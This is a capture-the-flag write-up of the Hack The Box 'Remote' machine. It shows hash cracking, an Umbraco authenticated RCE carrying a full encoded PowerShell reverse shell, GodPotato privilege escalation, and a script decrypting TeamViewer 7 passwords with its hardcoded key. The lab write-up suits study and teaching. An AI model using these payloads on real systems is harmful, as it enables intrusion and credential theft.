> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-remote.md).

# HTB - Remote

## Enumeration

### NMAP

```bash
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
111/tcp   open  rpcbind       2-4 (RPC #100000)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
```

### FTP

Anonymous access successful but nothing in the root directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FSSzlVu1hHUlA6s6SfSYX%2Fimage.png?alt=media&amp;token=10701cbb-de4b-487a-b064-ebb667e387cc" alt=""><figcaption></figcaption></figure>

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhQ2JVfOWyLNbMOQEP5vL%2Fimage.png?alt=media&amp;token=6779f7ce-2d78-406c-8533-504741918248" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0pxek5taSzKZ8PfWDUaN%2Fimage.png?alt=media&amp;token=6327ce00-dea4-45df-8143-50729b933fe6" alt=""><figcaption></figcaption></figure>

Possible usernames.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVsqEgSPzzqx7t4tRtFrq%2Fimage.png?alt=media&amp;token=e6c47831-8842-44c1-b6cf-6877ae0e94aa" alt=""><figcaption></figcaption></figure>

Directory enumeration revealed there is an umbraco cms installed on the machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpkQLmvj8qZQI0NFZCUpE%2Fimage.png?alt=media&amp;token=a70e8c26-f3f4-484b-a6a9-811348a43b2b" alt=""><figcaption></figcaption></figure>

There is a login page on `/umbraco`.

### NFS - 2049

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcbmHhQnAnaY9eRiBlW3P%2Fimage.png?alt=media&amp;token=dd5a3a91-9261-4494-9c03-b9fd30113eac" alt=""><figcaption></figcaption></figure>

There is a NFS share called `/site-backups` which we can mount locally and inspect.

```bash
┌──(ajay㉿kali)-[~]
└─$ mkdir mount     
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ sudo mount -t nfs 10.129.230.172:/ ./mount/ -o nolock                                                                                   
[sudo] password for ajay: 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ cd mount       
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/mount]
└─$ ls                       
site_backups
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/mount]
└─$ cd site_backups 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/mount/site_backups]
└─$ ls
App_Browsers  App_Data  App_Plugins  aspnet_client  bin  Config  css  default.aspx  Global.asax  Media  scripts  Umbraco  Umbraco_Client  Views  Web.config
```

The Web.config file leaks the following info.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FygkutXUy2CUHDXM4M88u%2Fimage.png?alt=media&amp;token=922b9e52-326c-4a8f-9bb1-ede59942f936" alt=""><figcaption></figcaption></figure>

The version of Umbraco CMS is 7.12.4.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FL6bwsL64iX4EWyR1lPuE%2Fimage.png?alt=media&amp;token=923be813-4f18-4578-a9ba-a7c068e1cfc5" alt=""><figcaption></figcaption></figure>

There is an umbraco.sdf file. The .sdf is a SQL Server Compact binary, but you can grep it directly since strings are stored in plaintext:\
Running strings on the sdf file leaks the following data

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRxluomHL9HItqrDBh3OJ%2Fimage.png?alt=media&amp;token=c870bcdd-633a-4a91-a564-6d6b66353dc4" alt=""><figcaption></figcaption></figure>

```
Email: admin@htb.local
Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
Algorithm: SHA1
```

```
Email: ssmith@htb.local
Hash: jxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts=
Algorithm: HMACSHA256
```

i can crack the admin hash using hashcat

```bash
──(ajay㉿kali)-[~]
└─$ hashcat -m 100 'b8be16afba8c314ad33d812f22a04991b90e2aaa' /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese   
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 100 (SHA1)
Hash.Target......: b8be16afba8c314ad33d812f22a04991b90e2aaa
Time.Started.....: Tue Jun  9 23:36:51 2026 (4 secs)
Time.Estimated...: Tue Jun  9 23:36:55 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  2832.8 kH/s (0.35ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9826304/14344385 (68.50%)
Rejected.........: 0/9826304 (0.00%)
Restore.Point....: 9822208/14344385 (68.47%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: badboi56 -> bacano1106
Hardware.Mon.#01.: Util: 38%

Started: Tue Jun  9 23:36:31 2026
Stopped: Tue Jun  9 23:36:56 2026

```

`admin@htb.local : baconandcheese`

## Foothold

### Umbraco CMS Login

Login with the admin creds.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fd6pChay80h4EjJGoWrz5%2Fimage.png?alt=media&amp;token=eb33d17c-b9ce-4c42-a113-3a48d7c8ae30" alt=""><figcaption></figcaption></figure>

A google search revealed umbraco is vulnerable to Remote code Execution.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYrUqGHHH8hWW4f5KdkhD%2Fimage.png?alt=media&amp;token=40f14096-9e9a-42b5-a087-d6ee00b54af7" alt=""><figcaption></figcaption></figure>

Umbraco's back-office allows admins to create and execute XSLT stylesheets and Razor templates and it doesn't sandbox them. Since these run server-side with the permissions of the IIS app pool, you get direct code execution.

{% embed url="<https://github.com/noraj/Umbraco-RCE>" %}

Got the above POC to exploit the vulnerability.

### Exploiting Umbraco 7.12.4

For this we need admin creds. which we extracted from `umbraco.sdf` file

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FN5snn0VtwBXaNYw2djc2%2Fimage.png?alt=media&amp;token=4c488152-18ce-47a6-91f6-a27ea58d3c12" alt=""><figcaption></figcaption></figure>

RCE....!!! Confirmed. Now we can use it to get Shell.

i can setup a listener and get a shell.

I will use the revshells to create a powershell reverse shell.

```bash
┌──(ajay㉿kali)-[~/Umbraco-RCE]
└─$ python3 exploit.py -u admin@htb.local -p baconandcheese \
  -i http://10.129.230.172 \
  -c powershell \
> -a "-e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AMgAwADQAIgAsADcANwA3ADcAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"
```

## Shell as iis apppool

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fvw8Wx7A1Inait17fceHV%2Fimage.png?alt=media&amp;token=6b8445e8-f999-4ba5-bc1e-ffb528542220" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLYqS2fyXrnPjLhLdHhIm%2Fimage.png?alt=media&amp;token=c14ce556-d097-4b75-b1b0-0af15886f8b6" alt=""><figcaption></figcaption></figure>

Enumerating the privileges revealed that the user has `SeImpersonate` Privilege enabled. So i can use `God Potato` to exploit it to get Elevated Shell.

### Exploiting SeImpersonate Privilege using Godpotato

Transfer Godpotato to the shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDWjxULHlHTeK63EnFDtQ%2Fimage.png?alt=media&amp;token=ea17323a-f383-463f-bd06-f7250a5a99b0" alt=""><figcaption></figcaption></figure>

```bash
PS C:\Users\Public\Desktop> C:\Windows\Temp\gp.exe -cmd "whoami"
[*] CombaseModule: 0x140714536140800
[*] DispatchTable: 0x140714538458352
[*] UseProtseqFunction: 0x140714537833632
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\73de98cb-2cf8-4569-9054-7093e5dfe467\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000a802-1358-ffff-31bd-2eba8eff39df
[*] DCOM obj OXID: 0x6519f1ea5a187696
[*] DCOM obj OID: 0x50868c93a0712406
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 852 Token:0x800  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3108
nt authority\system

```

The Godpotato works...!!! Now i can use it get the shell for which i have transfer netcat to the shell and used it to get NT authority shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F61X3Y01hPHLJ0M54qjoQ%2Fimage.png?alt=media&amp;token=c679fa1a-e7b2-4bf9-960d-986270c3a9d8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhPiccJrBABb84bLxffvW%2Fimage.png?alt=media&amp;token=ca28bbf5-66d4-481c-9e20-da73f366d3b6" alt=""><figcaption></figcaption></figure>

## Shell as NT Authority System

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRTDKACKII2ZWiKafWpqZ%2Fimage.png?alt=media&amp;token=b6b4e3dc-8e43-41b4-89ea-c5ad1cf740e5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FXTjlV9vkQZz5Y9JffDae%2Fimage.png?alt=media&amp;token=3918adfd-4a42-4b2e-8ff4-78edf7bbe90c" alt=""><figcaption></figcaption></figure>

Now this is not the intended way, hackthebox expects us to complete the machine.

## Intended Way of Completing Machine

View the tasklist : `tasklist /svc`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F82dGMJZe7wTzgwrVM6wx%2Fimage.png?alt=media&amp;token=40f3a90e-dee8-4704-b3e3-775166651020" alt=""><figcaption></figcaption></figure>

There is non default service running on the machine called TeamViewer7.

A google search revealed that the service is vulnerable to credential disclosure.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FAaSAaVPOh1hDjsd3ABQ9%2Fimage.png?alt=media&amp;token=09c82440-eb4c-44be-bbdb-2da24c70568c" alt=""><figcaption></figcaption></figure>

### Exploiting TeamViewer7 Vulnerability

TeamViewer stores passwords encrypted with AES-128-CBC using a hardcoded key and IV baked into the binary itself (TeamViewer.exe).

```bash
PS C:\Users\Public\Desktop> reg query "HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7"

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
    StartMenuGroup    REG_SZ    TeamViewer 7
    InstallationDate    REG_SZ    2020-02-20
    InstallationDirectory    REG_SZ    C:\Program Files (x86)\TeamViewer\Version7
    Always_Online    REG_DWORD    0x1
    Security_ActivateDirectIn    REG_DWORD    0x0
    Version    REG_SZ    7.0.43148
    ClientIC    REG_DWORD    0x11f25831
    PK    REG_BINARY    BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
    SK    REG_BINARY    F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
    LastMACUsed    REG_MULTI_SZ    \0A2DEAD541880
    MIDInitiativeGUID    REG_SZ    {514ed376-a4ee-4507-a28b-484604ed0ba0}
    MIDVersion    REG_DWORD    0x1
    ClientID    REG_DWORD    0x6972e4aa
    CUse    REG_DWORD    0x1
    LastUpdateCheck    REG_DWORD    0x659d58d6
    UsageEnvironmentBackup    REG_DWORD    0x1
    SecurityPasswordAES    REG_BINARY    FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
    MultiPwdMgmtIDs    REG_MULTI_SZ    admin
    MultiPwdMgmtPWDs    REG_MULTI_SZ    357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
    Security_PasswordStrength    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7\DefaultSettings
```

SecurityPassword is leaked which i can crack.

Researchers reversed the TeamViewer 7 binary and found these constants hardcoded directly in the executable:

```
Key: 0602000000a400005253413100040000
IV:  0100010067244F436E6762F25EA8D704
```

Every installation of TeamViewer 7 uses the exact same key and IV to encrypt the SecurityPasswordAES registry value. There's no per-machine key, no salt, nothing unique — just static crypto constants in the binary.

### Cracking the TeamViewer7 Security Password

I have used this python3 code generated by AI to decrypt the password

```bash
from Crypto.Cipher import AES
import binascii

key = binascii.unhexlify("0602000000a400005253413100040000")
iv  = binascii.unhexlify("0100010067244F436E6762F25EA8D704")

hex_pass = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(binascii.unhexlify(hex_pass))
print(decrypted.decode('utf-16-le').rstrip('\x00'))
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FxiB5cDarwILpu3ryJyRl%2Fimage.png?alt=media&amp;token=3a2a6a41-4052-43bf-ac82-d6d82388a7b0" alt=""><figcaption></figcaption></figure>

Using this password aganist the Administrator account using netexec gives us that the creds are valid.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDiggbaEbkzwQLEc2j5P0%2Fimage.png?alt=media&amp;token=e4ea3611-96c8-4f6d-9430-f6b81567b085" alt=""><figcaption></figcaption></figure>

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FO6PbPBQpT7uO0GwQsvi0%2Fimage.png?alt=media&amp;token=1cdab20c-e5ac-49a7-9364-f7f34ecced64" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-remote.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
